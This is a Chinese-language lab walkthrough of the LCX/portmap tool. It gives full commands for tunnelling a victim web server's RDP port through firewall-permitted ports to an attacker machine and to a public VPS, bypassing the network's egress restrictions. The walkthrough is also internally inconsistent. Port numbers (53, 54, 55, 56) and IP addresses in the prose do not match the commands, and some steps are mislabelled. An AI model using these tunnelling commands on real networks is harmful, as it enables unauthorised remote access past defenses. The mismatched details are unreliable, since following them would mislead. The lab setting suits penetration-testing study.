一、LCX介绍                                                                                    

LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMap。LCX有端口映射和端口转发两大功 能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使 用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制。 

Windows版的 LCX用法:

端口转发:

Lcx -listen <监听slave请求的端口><等待连接的端口> Lcx -slave <攻击机IP><监听端口><目标IP><目标端口> 端口映射:
Lcx -tran<等待连接的端口><目标IP><日标端口>

 

Linux版的LCX用法:

 

Usage:./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]
-v: version
-h1: host1
-h2: host2
-p1: port1
-p2: port2
-log: log the data
-m: the action method for this tool
1: listen on PORT1 and connect to HOST2:PORT2
2: listen on PORT1 and PORT2
3: connect to HOST1:PORT1 and HOST2:PORT2

二、LCX正向代理

1、实验场景

由于配置了防火墙只允许web访问,这个时候攻击者想访问3389端口,远程连接是不可以的,就需要使用LCX进行端口转发

Web服务器开启了80端口,3389端口不允许出网,可以将web服务器的3389端口转发到允许出网的53端口,这个 时候攻击者在本地监听53端口并且转发到1111端口,这个时候攻击者连接自己的1111端口,等于访问web服务器 的3389端口

2、网络拓扑图

LCX反弹shell_端口转发

3、机器介绍

机器名称

IP地址

系统版本

备注

攻击机

192.168.101.14

windows10 


靶机

192.168.200.129

windows server 2016


4、实验复现

1、在攻击机器上运行以下命令,监听本地53端口并且转发到本地1111端口

lcx -listen 55 1111

LCX反弹shell_端口映射_02

2、在web靶机上运行以下命令, 将本地的3389端口转发到192.168.3.27的 53端口

lcx.exe -slave 192.168.1.138 55 127.0.0.1 3389

LCX反弹shell_web服务器_03

3、在攻击机器上运行远程桌面,地址为127.0.0.1:1111

LCX反弹shell_lcx_04

LCX反弹shell_端口映射_05

三、LCX反向代理

1、实验场景

Web服务器开启了80端口,3389端口不允许出网,可以将web服务器的3389端口转发到允许出网的54端口,这个 时候攻击者在VPS监听54端口并且转发到1111端口,这个时候攻击者连接VPS的1111端口,等于访问web服务器的3389端口

2、网络拓扑图

LCX反弹shell_lcx_06


3、机器介绍

机器名称

IP地址

系统版本

备注

攻击机

192.168.101.200

windows10 


公网VPS

120.46.138.91

Centos7


靶机

192.168.200.129

windows server 2016


4、实验复现

1、在攻击机器上运行以下命令,监听本地53端口并且转发到本地1111端口

 

lcx -slave 120.46.138.91 56 127.0.0.1 3389

LCX反弹shell_lcx_07

 2、在vps运行lcx -listen 54 1111,因为我的机器vps机器是linux系统所以使用portmap

 

[root@hecs-28928 lcx]# ./portmap -m 2 -p1 55 -p2 1111

LCX反弹shell_web服务器_08

3、在那内攻击机器上连接118.178.134.226:1111

LCX反弹shell_端口映射_09

LCX反弹shell_端口转发_10